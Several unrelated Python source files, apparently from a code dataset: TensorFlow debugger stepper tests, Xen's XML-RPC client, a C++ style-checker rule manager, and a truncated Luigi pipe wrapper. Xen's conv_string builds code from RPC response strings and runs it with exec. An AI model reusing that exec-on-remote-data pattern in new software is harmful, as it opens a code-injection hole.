# and its result should reflect the overriding value.
self.assertAllClose(484.0, stepper.cont("q:0"))
self.assertEqual({
"v/read:0": NodeStepper.FEED_TYPE_OVERRIDE
}, stepper.last_feed_types())
def testRemovingOverrideToUpstreamTensorInvalidatesDumpedIntermediates(self):
with NodeStepper(self.sess, self.q) as stepper:
stepper.override_tensor("v/read:0", 9.0)
self.assertItemsEqual(["v/read:0"], stepper.override_names())
self.assertAllClose(324.0, stepper.cont(self.q))
self.assertItemsEqual(["p:0"], stepper.intermediate_tensor_names())
stepper.remove_override("v/read:0")
self.assertItemsEqual([], stepper.override_names())
# Removing the pre-existing override to v/read:0 should have invalidated
# the dumped intermediate tensor.
self.assertItemsEqual([], stepper.intermediate_tensor_names())
def testRepeatedCallsToAssignAddDoesNotUpdateVariableAgain(self):
with NodeStepper(self.sess, self.v_add) as stepper:
stepper.cont(self.v_add)
self.assertSetEqual({self.v.name}, stepper.last_updated())
self.assertAllClose(12.0, stepper.cont(self.v))
stepper.cont(self.v_add)
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual({"v_add:0": NodeStepper.FEED_TYPE_HANDLE},
stepper.last_feed_types())
self.assertAllClose(12.0, stepper.cont(self.v))
def testRepeatedCallsToAssignAddDownStreamDoesNotUpdateVariableAgain(self):
with NodeStepper(self.sess, self.v_add_plus_one) as stepper:
stepper.cont(self.v_add_plus_one)
self.assertSetEqual({self.v.name}, stepper.last_updated())
self.assertAllClose(12.0, stepper.cont(self.v))
stepper.cont(self.v_add_plus_one)
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual({"v_add_plus_one:0": NodeStepper.FEED_TYPE_HANDLE},
stepper.last_feed_types())
self.assertAllClose(12.0, stepper.cont(self.v))
class StepperBackwardRunTest(test_util.TensorFlowTestCase):
def setUp(self):
"""Test setup.
Structure of the forward graph:
f
| |
----- -----
| |
d e
| | | |
--- --------- ---
| | |
a b c
Construct a backward graph using the GradientDescentOptimizer.
"""
self.a = variables.Variable(1.0, name="a")
self.b = variables.Variable(2.0, name="b")
self.c = variables.Variable(4.0, name="c")
self.d = math_ops.multiply(self.a, self.b, name="d")
self.e = math_ops.multiply(self.b, self.c, name="e")
self.f = math_ops.multiply(self.d, self.e, name="f")
    # Gradient descent optimizer that minimizes f.
gradient_descent.GradientDescentOptimizer(0.01).minimize(
self.f, name="optim")
self.sess = session.Session()
self.sess.run(variables.global_variables_initializer())
def tearDown(self):
ops.reset_default_graph()
def testContToUpdateA(self):
with NodeStepper(self.sess, "optim") as stepper:
result = stepper.cont("a:0")
self.assertAllClose(1.0, result)
self.assertEqual({}, stepper.last_feed_types())
result = stepper.cont("optim/learning_rate:0")
self.assertAllClose(0.01, result)
self.assertEqual({}, stepper.last_feed_types())
# Before any cont calls on ApplyGradientDescent, there should be no
# "dirty" variables.
self.assertEqual(set(), stepper.dirty_variables())
      # First, cont() to one of the two control inputs of optim.
result = stepper.cont("optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=True)
# Now variable a should have been marked as dirty due to the update
# by optim/update_a/ApplyGradientDescent.
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual({"a:0"}, stepper.dirty_variables())
self.assertIsNone(result)
self.assertEqual({
"optim/learning_rate:0": NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
      # Check that Variable "a" has been updated properly, while "b" and "c"
      # remain the same.
# For backprop on Variable a:
# Because f = a * b * b * c, df / da = b * b * c.
# 1.0 - learning_rate * b * b * c
# = 1.0 - 0.01 * 2.0 * 2.0 * 4.0 = 0.84.
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(2.0, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testContToUpdateB(self):
with NodeStepper(self.sess, "optim") as stepper:
result = stepper.cont("optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=True)
self.assertIsNone(result)
self.assertSetEqual({"b:0"}, stepper.last_updated())
self.assertEqual(set(["b:0"]), stepper.dirty_variables())
# For backprop on Variable b:
      # Because f = a * b * b * c, df / db = 2 * a * b * c.
# 2.0 - learning_rate * 2 * a * b * c
# = 2.0 - 0.01 * 2 * 1.0 * 2.0 * 4.0 = 1.84
self.assertAllClose(1.0, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testContAfterUpdateWithoutRestoringVariableValue(self):
with NodeStepper(self.sess, "optim") as stepper:
# First, update Variable a from 1.0 to 0.84.
result = stepper.cont(
"optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual(set(["a:0"]), stepper.dirty_variables())
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(2.0, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
# Tracking of the updated variables should have invalidated all
# intermediate tensors downstream to a:0.
self.assertNotIn("a/read:0", stepper.intermediate_tensor_names())
self.assertNotIn("d:0", stepper.intermediate_tensor_names())
# Second, update Variable b without the default restore_variable_values.
result = stepper.cont(
"optim/update_b/ApplyGradientDescent", restore_variable_values=False)
self.assertIsNone(result)
# For the backprop on Variable b under the updated value of a:
# 2.0 - learning_rate * 2 * a' * b * c
# = 2.0 - 0.01 * 2 * 0.84 * 2.0 * 4.0 = 1.8656
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(1.8656, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testContNotInvalidatingFromVariableUpdatesWorksForNextUpdate(self):
with NodeStepper(self.sess, "optim") as stepper:
self.assertIsNone(stepper.cont(
"optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=False))
# Even though invalidate_from_updated_variables is set to False, dirty
# variables should still have been tracked.
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual({"a:0"}, stepper.dirty_variables())
self.assertIn("a/read:0", stepper.intermediate_tensor_names())
self.assertIn("b/read:0", stepper.intermediate_tensor_names())
self.assertIn("c/read:0", stepper.intermediate_tensor_names())
self.assertIn("d:0", stepper.intermediate_tensor_names())
self.assertIn("e:0", stepper.intermediate_tensor_names())
self.assertIn("optim/learning_rate:0",
stepper.intermediate_tensor_names())
self.assertNotIn("a:0", stepper.intermediate_tensor_names())
self.assertNotIn("b:0", stepper.intermediate_tensor_names())
self.assertNotIn("c:0", stepper.intermediate_tensor_names())
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(2.0, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
# For the backprop on Variable b, the result should reflect the original
# value of Variable a, even though Variable a has actually been updated.
# 2.0 - learning_rate * 2 * a * b * c
# = 2.0 - 0.01 * 2 * 1.0 * 2.0 * 4.0 = 1.84
self.assertIsNone(stepper.cont(
"optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=False,
restore_variable_values=False))
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testUpdateTwiceRestoreVariable(self):
with NodeStepper(self.sess, "optim") as stepper:
result = stepper.cont(
"optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual({"a:0"}, stepper.dirty_variables())
result = stepper.cont(
"optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
# Variables a and c should have been restored and hence no longer dirty.
# Variable b should have been marked as dirty.
self.assertSetEqual({"b:0"}, stepper.last_updated())
self.assertEqual({"b:0"}, stepper.dirty_variables())
      # The result of the update should be identical to running only
      # update_b.
self.assertAllClose(1.0, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testSelectiveHandleUsageDependingOnTransitiveCleanliness(self):
"""Test tensor handlers are using only during clean transitive closure.
"clean" means no Variables have been updated by preceding cont() calls.
"""
with NodeStepper(self.sess, "optim") as stepper:
# First, call cont() on the two tensors on the intermediate level: e and
# f.
result = stepper.cont("d:0")
self.assertAllClose(2.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertItemsEqual(["a/read:0", "b/read:0"],
stepper.intermediate_tensor_names())
self.assertItemsEqual(["d:0"], stepper.handle_names())
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual(set(), stepper.dirty_variables())
result = stepper.cont("e:0")
self.assertAllClose(8.0, result)
self.assertEqual({
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE
}, stepper.last_feed_types())
self.assertItemsEqual(["d:0", "e:0"], stepper.handle_names())
self.assertItemsEqual(["a/read:0", "b/read:0", "c/read:0"],
stepper.intermediate_tensor_names())
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual(set(), stepper.dirty_variables())
# Now run update_a, so as to let Variable a be dirty.
result = stepper.cont(
"optim/update_a/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
# Due to the update to the value of a:0, the dumped intermediate a/read:0
# should have been invalidated.
self.assertNotIn("a/read:0", stepper.intermediate_tensor_names())
self.assertSetEqual({"a:0"}, stepper.last_updated())
self.assertEqual({"a:0"}, stepper.dirty_variables())
# Now, run update_b.
result = stepper.cont(
"optim/update_b/ApplyGradientDescent", restore_variable_values=True)
self.assertIsNone(result)
# The last cont() run should have use the handle of tensor e, but not the
# handle of tensor d, because the transitive closure of e is clean,
# whereas that of d is dirty due to the update to a in the previous cont()
# call.
last_feed_types = stepper.last_feed_types()
self.assertNotIn("d:0", last_feed_types)
self.assertEqual(NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
last_feed_types["b/read:0"])
self.assertEqual(NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
last_feed_types["c/read:0"])
      # The result of update_b should be identical to what it would be if no
      # other update_* cont() calls had occurred before.
self.assertAllClose(1.0, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(4.0, self.sess.run(self.c))
def testRestoreVariableValues(self):
"""Test restore_variable_values() restores the old values of variables."""
with NodeStepper(self.sess, "optim") as stepper:
stepper.cont(
"optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertAllClose(1.84, self.sess.run(self.b))
stepper.restore_variable_values()
self.assertAllClose(2.0, self.sess.run(self.b))
def testFinalize(self):
"""Test finalize() to restore variables and run the original fetch."""
with NodeStepper(self.sess, "optim") as stepper:
# Invoke update_b before calling finalize.
stepper.cont(
"optim/update_b/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
result = stepper.finalize()
self.assertIsNone(result)
# The results of the Variable updates should be the same as if no cont()
# call has occurred on update_b.
self.assertAllClose(0.84, self.sess.run(self.a))
self.assertAllClose(1.84, self.sess.run(self.b))
self.assertAllClose(3.96, self.sess.run(self.c))
def testOverrideThenContToUpdateThenRemoveOverrideThenUpdateAgain(self):
"""Test cont() to update nodes after overriding tensor values."""
with NodeStepper(self.sess, "optim") as stepper:
result = stepper.cont("d:0")
self.assertAllClose(2.0, result)
self.assertEqual({}, stepper.last_feed_types())
self.assertSetEqual(set(), stepper.last_updated())
self.assertEqual(set(), stepper.dirty_variables())
self.assertEqual(["d:0"], stepper.handle_names())
self.assertSetEqual({"d"}, stepper.handle_node_names())
# Override the value from 1.0 to 10.0.
stepper.override_tensor("a/read:0", 10.0)
self.assertEqual(["a/read:0"], stepper.override_names())
result = stepper.cont(
"optim/update_c/ApplyGradientDescent",
invalidate_from_updated_variables=True,
restore_variable_values=True)
self.assertIsNone(result)
# The last cont() call should have not used the tensor handle to d:0,
# because the transitive closure of d:0 contains an override tensor.
self.assertEqual({
"a/read:0": NodeStepper.FEED_TYPE_OVERRIDE,
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
# The tensor handle to d:0 should have been removed due to the dirty
# transitive closure.
self.assertEqual([], stepper.handle_names())
self.assertSetEqual(set(), stepper.handle_node_names())
# For this backprop on c, the overriding value of a/read:0 should have
# been used:
# 4.0 - learning_rate * a * b * b
# = 4.0 - 0.01 * 10.0 * 2.0 * 2.0 = 3.6.
self.assertAllClose(3.6, self.sess.run(self.c))
# Now remove the overriding value of a/read:0.
stepper.remove_override("a/read:0")
self.assertEqual([], stepper.override_names())
# Obtain the tensor handle to d:0 again.
result = stepper.cont("d:0")
self.assertAllClose(2.0, result)
self.assertEqual(["d:0"], stepper.handle_names())
self.assertSetEqual({"d"}, stepper.handle_node_names())
self.assertNotIn("a/read:0", stepper.last_feed_types())
# Then call update_c again, without restoring c.
result = stepper.cont("optim/update_c/ApplyGradientDescent",
restore_variable_values=False)
self.assertIsNone(result)
self.assertNotIn("a/read:0", stepper.last_feed_types())
# This time, the d:0 tensor handle should have been used, because its
# transitive closure is clean.
self.assertEqual({
"b/read:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
"d:0": NodeStepper.FEED_TYPE_HANDLE,
"optim/learning_rate:0": NodeStepper.FEED_TYPE_DUMPED_INTERMEDIATE,
}, stepper.last_feed_types())
      # For this backprop on c, the original (non-overridden) value of
      # a/read:0 should have been used:
# 3.6 - learning_rate * a * b * b
# = 3.6 - 0.01 * 1.0 * 2.0 * 2.0 = 3.56.
self.assertAllClose(3.56, self.sess.run(self.c))
def testContToNodeWithOutputTensors(self):
"""cont() to an op should cache its output tensors if appropriate."""
with NodeStepper(self.sess, "optim") as stepper:
# In the transitive closure of the stepper, look for an op of which the
# output tensor also is in the transitive closure.
      # Do not assume a specific op, e.g., "gradients/e_grad/Reshape_1",
# because it may vary between builds.
closure_elements = stepper.closure_elements()
op_with_output_in_closure = None
for element_name in closure_elements:
if element_name + ":0" in closure_elements:
op_with_output_in_closure = str(element_name)
break
      self.assertIsNotNone(op_with_output_in_closure)
      self.assertEqual(
          [0], stepper.output_slots_in_closure(op_with_output_in_closure))
output_tensor = op_with_output_in_closure + ":0"
# The op "gradients/?_grad/Reshape_1" is in the transitive closure of the
      # stepper, because it is the control input to another op. However, its
# output tensor "gradients/?_grad/Reshape_1:0" is also in the transitive
# closure, because it is the (non-control) input of certain ops. Calling
# cont() on the op should lead to the caching of the tensor handle for
# the output tensor.
stepper.cont(op_with_output_in_closure)
self.assertEqual([output_tensor], stepper.handle_names())
self.assertSetEqual({op_with_output_in_closure},
stepper.handle_node_names())
# Do a cont() call that uses the cached tensor of
# "gradients/?_grad/Reshape_1:0".
stepper.cont(output_tensor)
self.assertEqual({
output_tensor: NodeStepper.FEED_TYPE_HANDLE
}, stepper.last_feed_types())
if __name__ == "__main__":
googletest.main()
| wangyum/tensorflow | tensorflow/python/debug/lib/stepper_test.py | Python | apache-2.0 | 45,190 |
#============================================================================
# This library is free software; you can redistribute it and/or
# modify it under the terms of version 2.1 of the GNU Lesser General Public
# License as published by the Free Software Foundation.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#============================================================================
# Copyright (C) 2006 Anthony Liguori <[email protected]>
# Copyright (C) 2007 XenSource Inc.
#============================================================================
from httplib import FakeSocket, HTTPConnection, HTTP
import socket
import string
import xmlrpclib
from types import StringTypes
from sys import hexversion
try:
import SSHTransport
ssh_enabled = True
except ImportError:
# SSHTransport is disabled on Python <2.4, because it uses the subprocess
# package.
ssh_enabled = False
# A new ServerProxy that also supports httpu urls. An httpu URL comes in the
# form:
#
# httpu:///absolute/path/to/socket.sock
#
# It assumes that the RPC handler is /RPC2. This probably needs to be improved
class HTTPUnixConnection(HTTPConnection):
def connect(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.host)
class HTTPUnix(HTTP):
_connection_class = HTTPUnixConnection
class UnixTransport(xmlrpclib.Transport):
def request(self, host, handler, request_body, verbose=0):
self.__handler = handler
return xmlrpclib.Transport.request(self, host, '/RPC2',
request_body, verbose)
def make_connection(self, host):
if hexversion < 0x02070000:
# python 2.6 or earlier
return HTTPUnix(self.__handler)
else:
# xmlrpclib.Transport changed in python 2.7
return HTTPUnixConnection(self.__handler)
# We need our own transport for HTTPS, because xmlrpclib.SafeTransport is
# broken -- it does not handle ERROR_ZERO_RETURN properly.
class HTTPSTransport(xmlrpclib.SafeTransport):
def _parse_response(self, file, sock):
p, u = self.getparser()
while 1:
try:
if sock:
response = sock.recv(1024)
else:
response = file.read(1024)
except socket.sslerror, exn:
if exn[0] == socket.SSL_ERROR_ZERO_RETURN:
break
raise
if not response:
break
if self.verbose:
print 'body:', repr(response)
p.feed(response)
file.close()
p.close()
return u.close()
# See xmlrpclib2.TCPXMLRPCServer._marshalled_dispatch.
def conv_string(x):
if isinstance(x, StringTypes):
s = string.replace(x, "'", r"\047")
exec "s = '" + s + "'"
return s
else:
return x
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, transport=None, encoding=None, verbose=0,
allow_none=1):
if transport == None:
(protocol, rest) = uri.split(':', 1)
if protocol == 'httpu':
uri = 'http:' + rest
transport = UnixTransport()
elif protocol == 'https':
transport = HTTPSTransport()
elif protocol == 'ssh':
global ssh_enabled
if ssh_enabled:
(transport, uri) = SSHTransport.getHTTPURI(uri)
else:
raise ValueError(
"SSH transport not supported on Python <2.4.")
xmlrpclib.ServerProxy.__init__(self, uri, transport, encoding,
verbose, allow_none)
def __request(self, methodname, params):
response = xmlrpclib.ServerProxy.__request(self, methodname, params)
if isinstance(response, tuple):
return tuple([conv_string(x) for x in response])
else:
return conv_string(response)
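# Illustrative usage (a sketch; the socket path is hypothetical and depends
# on the local xend configuration):
#
#     server = ServerProxy('httpu:///var/run/xend/xmlrpc.sock')
#     server.system.listMethods()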
| flexiant/xen | tools/python/xen/util/xmlrpcclient.py | Python | gpl-2.0 | 4,533 |
# Copyright (c) 2009 NHN Inc. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of NHN Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os #@UnusedImport
import sys #@UnusedImport
import sre_compile
from nsiqcppstyle_util import * #@UnusedWildImport
class RuleManager :
def __init__(self, runtimePath) :
self.availRuleNames = []
basePath = os.path.join(runtimePath, "rules")
ruleFiles = os.listdir(basePath)
rulePattern = sre_compile.compile("^(.*)\.py$")
for eachRuleFile in ruleFiles :
if os.path.isfile(os.path.join(basePath, eachRuleFile)) :
ruleMatch = rulePattern.match(eachRuleFile)
if ruleMatch != None and eachRuleFile.find("__init__") == -1 :
ruleName = ruleMatch.group(1)
self.availRuleNames.append(ruleName)
self.availRuleCount = len(self.availRuleNames)
self.availRuleModules = {}
self.loadedRule = []
self.rules = []
self.preprocessRules = []
self.functionNameRules = []
self.functionScopeRules = []
self.typeNameRules = []
self.typeScopeRules = []
self.lineRules = []
self.fileEndRules = []
self.fileStartRules = []
self.projectRules = []
self.rollBackImporter = None
# self.LoadAllRules()
def LoadRules(self, checkingRuleNames, printRule = True):
"""
        Load rules. It resets previously loaded rules before loading new ones.
"""
self.ResetRules()
self.ResetRegisteredRules()
if self.rollBackImporter != None :
self.rollBackImporter.uninstall()
self.rollBackImporter = RollbackImporter()
if printRule :
print "======================================================================================"
for ruleName in checkingRuleNames :
count = self.availRuleNames.count(ruleName)
if count == 0 :
print "%s does not exist or incompatible." % ruleName
continue
else :
if printRule :
print " - ", ruleName, "is applied."
ruleModule = __import__("rules."+ruleName)
self.loadedRule.append(ruleModule)
if len(self.loadedRule) == 0 :
print " No Rule is specified. Please configure rules in filefilter.txt."
if printRule :
print "======================================================================================"
def ResetRules(self):
self.loadedRule = []
############################################################################
# Rule Runner
############################################################################
def RunPreprocessRule(self, lexer, contextStack):
""" Run rules which runs in the preprecessor blocks """
for preprocessRule in self.preprocessRules :
data = lexer.Backup()
preprocessRule(lexer, contextStack)
lexer.Restore(data)
def RunFunctionNameRule(self, lexer, functionFullName, decl, contextStack, functionContext) :
""" Run rules which runs on the function name """
for eachFunctionNameRule in self.functionNameRules :
data = lexer.Backup()
eachFunctionNameRule(lexer, functionFullName, decl, contextStack, functionContext)
lexer.Restore(data)
def RunFunctionScopeRule(self, lexer, contextStack):
""" Run rules which runs in the function blocks """
for eachFunctionScopeRule in self.functionScopeRules :
data = lexer.Backup()
eachFunctionScopeRule(lexer, contextStack)
lexer.Restore(data)
def RunTypeNameRule(self, lexer, typeName, typeFullName, decl, contextStack, typeContext):
""" Run rules which runs on the type names """
for typeNameRule in self.typeNameRules :
data = lexer.Backup()
typeNameRule(lexer, typeName, typeFullName, decl, contextStack, typeContext)
lexer.Restore(data)
def RunTypeScopeRule(self, lexer, contextStack):
""" Run rules which runs in the type blocks """
for typeScopeRule in self.typeScopeRules :
data = lexer.Backup()
typeScopeRule(lexer, contextStack)
lexer.Restore(data)
def RunRule(self, lexer, contextStack):
""" Run rules which runs in any tokens """
for rule in self.rules :
data = lexer.Backup()
rule(lexer, contextStack)
lexer.Restore(data)
def RunLineRule(self, lexer, line, lineno):
""" Run rules which runs in each lines. """
for lineRule in self.lineRules :
data = lexer.Backup()
lineRule(lexer, line, lineno)
lexer.Restore(data)
def RunFileEndRule(self, lexer, filename, dirname):
""" Run rules which runs at the end of files. """
for fileEndRule in self.fileEndRules :
data = lexer.Backup()
fileEndRule(lexer, filename, dirname)
lexer.Restore(data)
def RunFileStartRule(self, lexer, filename, dirname):
""" Run rules which runs at the start of files. """
for fileStartRule in self.fileStartRules :
data = lexer.Backup()
fileStartRule(lexer, filename, dirname)
lexer.Restore(data)
def RunProjectRules(self, targetName):
""" Run rules which runs once a project. """
for projectRule in self.projectRules :
projectRule(targetName)
############################################################################
# Rule Resister Methods
############################################################################
def ResetRegisteredRules(self):
""" Reset all registered rules. """
del self.functionNameRules[:]
del self.functionScopeRules[:]
del self.lineRules[:]
del self.rules[:]
del self.typeNameRules[:]
del self.typeScopeRules[:]
del self.fileStartRules[:]
del self.fileEndRules[:]
del self.projectRules[:]
del self.preprocessRules[:]
def AddPreprocessRule(self, preprocessRule):
""" Add rule which runs in preprocess statements """
self.preprocessRules.append(preprocessRule)
def AddFunctionScopeRule(self, functionScopeRule):
""" Add rule which runs in function scope """
self.functionScopeRules.append(functionScopeRule)
def AddFunctionNameRule(self, functionRule):
""" Add rule on the function name place"""
self.functionNameRules.append(functionRule)
def AddLineRule(self, lineRule):
""" Add rule on the each line """
self.lineRules.append(lineRule)
def AddRule(self, rule):
""" Add rule on any token """
self.rules.append(rule)
def AddTypeNameRule(self, typeNameRule):
""" Add rule on any type (class / struct / union / namesapce / enum) """
self.typeNameRules.append(typeNameRule)
def AddTypeScopeRule(self, typeScopeRule):
""" Add rule on the any type definition scope """
self.typeScopeRules.append(typeScopeRule)
def AddFileEndRule(self, fileEndRule):
"""
Add rule on the file end
Added Rule should be function with following prototype "def RunRule(lexer, filename, dirname)"
lexer is the lexer used to analyze the source. it points the end token of source.
filename is the filename analyzed.
dirname is the file directory.
"""
self.fileEndRules.append(fileEndRule)
def AddFileStartRule(self, fileStartRule):
"""
Add rule on the file start
Added Rule should be function with following prototype "def RunRule(lexer, filename, dirname)"
lexer is the lexer used to analyze the source. it points the start token of source.
filename is the filename analyzed.
dirname is the file directory.
"""
self.fileStartRules.append(fileStartRule)
def AddProjectRules(self, projectRule):
"""
Add rule on the project
Added Rule should be function with following prototype "def RunRule(targetName)"
targetName is the analysis target directory.
"""
self.projectRules.append(projectRule)
class RollbackImporter:
def __init__(self):
"Creates an instance and installs as the global importer"
self.previousModules = sys.modules.copy()
self.realImport = __builtins__["__import__"]
__builtins__["__import__"] = self._import
self.newModules = {}
def _import(self, name, globals=None, locals=None, fromlist=[]):
result = apply(self.realImport, (name, globals, locals, fromlist))
if name.find("rules") != -1 :
self.newModules[name] = 1
return result
def uninstall(self):
for modname in self.newModules.keys():
if modname.find("rules") != -1 :
if not self.previousModules.has_key(modname):
# Force reload when modname next imported
del(sys.modules[modname])
__builtins__["__import__"] = self.realImport
ruleManager = RuleManager(GetRuntimePath())
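# Illustrative use of the rule hooks (the rule body below is hypothetical;
# real rules live in the "rules" package and register themselves at import
# time):
#
#     def RunRule(lexer, line, lineno) :
#         if len(line) > 120 :
#             pass  # report a violation here
#
#     ruleManager.AddLineRule(RunRule)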
| gleicher27/Tardigrade | moose/framework/contrib/nsiqcppstyle/nsiqcppstyle_rulemanager.py | Python | lgpl-2.1 | 10,691 |
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import signal
import subprocess
import io
import os
import re
import locale
import tempfile
import warnings
from luigi import six
class FileWrapper(object):
"""
    Wrap `file` in a "real" object so stuff can be added to it after creation.
"""
def __init__(self, file_object):
self._subpipe = file_object
def __getattr__(self, name):
# forward calls to 'write', 'close' and other methods not defined below
return getattr(self._subpipe, name)
def __enter__(self, *args, **kwargs):
# instead of returning whatever is returned by __enter__ on the subpipe
# this returns self, so whatever custom injected methods are still available
# this might cause problems with custom file_objects, but seems to work
# fine with standard python `file` objects which is the only default use
return self
def __exit__(self, *args, **kwargs):
return self._subpipe.__exit__(*args, **kwargs)
def __iter__(self):
return iter(self._subpipe)
class InputPipeProcessWrapper(object):
def __init__(self, command, input_pipe=None):
"""
        Initializes an InputPipeProcessWrapper instance.
:param command: a subprocess.Popen instance with stdin=input_pipe and
stdout=subprocess.PIPE.
Alternatively, just its args argument as a convenience.
"""
self._command = command
self._input_pipe = input_pipe
self._original_input = True
if input_pipe is not None:
try:
input_pipe.fileno()
except AttributeError:
# subprocess require a fileno to work, if not present we copy to disk first
self._original_input = False
f = tempfile.NamedTemporaryFile('wb', prefix='luigi-process_tmp', delete=False)
self._tmp_file = f.name
f.write(input_pipe.read())
input_pipe.close()
f.close()
self._input_pipe = FileWrapper(io.BufferedReader(io.FileIO(self._tmp_file, 'r')))
self._process = command if isinstance(command, subprocess.Popen) else self.create_subprocess(command)
# we want to keep a circular reference to avoid garbage collection
# when the object is used in, e.g., pipe.read()
self._process._selfref = self
def create_subprocess(self, command):
"""
http://www.chiark.greenend.org.uk/ucgi/~cjwatson/blosxom/2009-07-02-python-sigpipe.html
"""
def subprocess_setup():
# Python installs a SIGPIPE handler by default. This is usually not what
# non-Python subprocesses expect.
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
return subprocess.Popen(command,
stdin=self._input_pipe,
stdout=subprocess.PIPE,
preexec_fn=subprocess_setup,
close_fds=True)
def _finish(self):
# Need to close this before input_pipe to get all SIGPIPE messages correctly
self._process.stdout.close()
if not self._original_input and os.path.exists(self._tmp_file):
os.remove(self._tmp_file)
if self._input_pipe is not None:
self._input_pipe.close()
self._process.wait() # deadlock?
if self._process.returncode not in (0, 141, 128 - 141):
            # 141 == 128 + 13 == 128 + SIGPIPE - normally processes exit with 128 + {received SIG}
# 128 - 141 == -13 == -SIGPIPE, sometimes python receives -13 for some subprocesses
raise RuntimeError('Error reading from pipe. Subcommand exited with non-zero exit status %s.' % self._process.returncode)
def close(self):
self._finish()
def __del__(self):
self._finish()
def __enter__(self):
return self
def _abort(self):
"""
Call _finish, but eat the exception (if any).
"""
try:
self._finish()
except KeyboardInterrupt:
raise
except BaseException:
pass
def __exit__(self, type, value, traceback):
if type:
self._abort()
else:
self._finish()
def __getattr__(self, name):
if name == '_process':
raise AttributeError(name)
try:
return getattr(self._process.stdout, name)
except AttributeError:
return getattr(self._input_pipe, name)
def __iter__(self):
for line in self._process.stdout:
yield line
self._finish()
def readable(self):
return True
def writable(self):
return False
def seekable(self):
return False
class OutputPipeProcessWrapper(object):
